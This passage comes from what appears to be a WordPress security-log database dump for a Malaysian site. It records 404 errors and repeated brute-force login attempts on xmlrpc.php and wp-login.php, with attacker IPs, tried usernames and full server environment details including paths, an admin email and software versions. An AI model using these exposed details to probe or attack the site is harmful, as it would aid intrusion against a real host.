Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/dev/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/dev/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRGFWXkG1atThADMYGPrQAAANM\";s:12:\"REDIRECT_URL\";s:15:\"/dev/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:12:\"92.61.114.40\";s:11:\"REMOTE_PORT\";s:5:\"48744\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/dev/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:15:\"/dev/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRGFWXkG1atThADMYGPrQAAANM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566852629.7488\";s:12:\"REQUEST_TIME\";s:10:\"1566852629\";}}','notice','2019-08-26 20:50:34','2019-08-26 20:50:30',18320184,19604440,'http://bintara.com.my/dev/xmlrpc.php',1,0,'92.61.114.40'),(28898,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:83:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1571915488.9384899139404296875000\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1571915488.9384899139404296875000\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.3; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1571915488.9384899139404296875000\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.3; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:29:\"/sbin:/usr/sbin:/bin:/usr/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1571915488.9384899139404296875000\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"42372\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1571915488.9384899139404296875000\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XbGG4O0MT698oQwhBK9HYwAAARA\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbGG4O0MT698oQwhBK9HYwAAARA\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"42372\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbGG4O0MT698oQwhBK9HYwAAARA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571916397.1506\";s:12:\"REQUEST_TIME\";s:10:\"1571916397\";}}','notice','2019-10-24 11:26:39','2019-10-24 11:26:37',35004456,35257128,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1571915488.9384899139404296875000',1,0,'103.6.198.69'),(23066,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"45.122.223.61\";s:11:\"REMOTE_PORT\";s:5:\"57920\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWN7c7Luw7edOKpgf7B10wAAAJI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566800755.8022\";s:12:\"REQUEST_TIME\";s:10:\"1566800755\";}}','notice','2019-08-26 06:25:57','2019-08-26 06:25:56',18201592,19500384,'https://bintara.com.my/xmlrpc.php',1,0,'45.122.223.61'),(23067,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"165.227.60.134\";s:11:\"REMOTE_PORT\";s:5:\"58346\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWN8W3xaD7qVX4VJuZ-dAQAAAAA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566800987.7781\";s:12:\"REQUEST_TIME\";s:10:\"1566800987\";}}','notice','2019-08-26 06:29:49','2019-08-26 06:29:48',17682984,19174808,'https://bintara.com.my/wp-login.php',1,0,'165.227.60.134'),(23068,0,'brute_force','invalid-login::username-vipverbadmin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:12:\"vipverbadmin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"480\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"165.227.60.134\";s:11:\"REMOTE_PORT\";s:5:\"58902\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWN8XzzAXRCh@i15RK0yZwAAANQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566800991.735\";s:12:\"REQUEST_TIME\";s:10:\"1566800991\";}}','notice','2019-08-26 06:29:53','2019-08-26 06:29:52',18201120,19500560,'https://bintara.com.my/xmlrpc.php',1,0,'165.227.60.134'),(23069,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"82.146.34.121\";s:11:\"REMOTE_PORT\";s:5:\"38620\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWN8gjzAXRCh@i15RK0ycgAAAMI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566801026.2355\";s:12:\"REQUEST_TIME\";s:10:\"1566801026\";}}','notice','2019-08-26 06:30:27','2019-08-26 06:30:26',17685320,19175728,'https://bintara.com.my/wp-login.php',1,0,'82.146.34.121'),(23070,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"131.108.103.230\";s:11:\"REMOTE_PORT\";s:5:\"58400\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWN@xHxaD7qVX4VJuZ-fSgAAAAA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566801604.5652\";s:12:\"REQUEST_TIME\";s:10:\"1566801604\";}}','notice','2019-08-26 06:40:06','2019-08-26 06:40:05',17685296,19176584,'https://bintara.com.my/wp-login.php',1,0,'131.108.103.230'),(23071,0,'brute_force','invalid-login::username-abcd','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:4:\"abcd\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"472\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"131.108.103.230\";s:11:\"REMOTE_PORT\";s:5:\"59058\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWN@yDzAXRCh@i15RK0y0AAAANI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566801608.6897\";s:12:\"REQUEST_TIME\";s:10:\"1566801608\";}}','notice','2019-08-26 06:40:10','2019-08-26 06:40:09',18199840,19498896,'https://bintara.com.my/xmlrpc.php',1,0,'131.108.103.230'),(23072,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 